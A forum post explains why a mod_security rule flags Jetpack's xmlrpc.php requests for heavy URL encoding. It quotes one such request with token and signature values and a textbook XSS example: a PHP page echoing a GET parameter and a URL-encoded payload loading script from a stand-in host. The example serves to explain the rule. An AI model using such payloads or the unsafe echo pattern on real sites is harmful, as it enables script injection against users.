ok Ben, hope to hear soon from you all guys.
In the meanwhile, I was googling and reading about this, and there are lot of opinions regarding when you are abusing of URL Encoding and in the other hand when may be considered false positives.
The problem for the mod_security rule is that the petitions coming from your server are abusing of URL Encoding (overuse of % character)
/xmlrpc.php?for=jetpack&token=UDynqyk%28KhOa5IVz%40qFcr%246N4KCe7%25KP%3A1%3A1×tamp=1391327747&nonce=Tzsb9ZWduZ&body-hash=8leichwVzcK9QXEh0Tsy6MnFcAY%3D&signature=RcNRr2yuXyHc52ZFPKQ7D7lrQY8%3D HTTP/1.1
In despite you can have many good reasons for some JetPack system to launch pings using that command line, the purpose of this mod_security rule is to detect misuse and abuse of RFC2396 and protect against things like this type of Cross-Site Scripting:
Excerpt from an arbitrary web page - “getdata.php”: echo $HTTP_GET_VARS[“data”];
URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f
www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e
HTML execution: <script src=”http://www.badplace.com/nasty.js”></script>That's why YOUR server looks suspicious to mod_security.
Source: http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html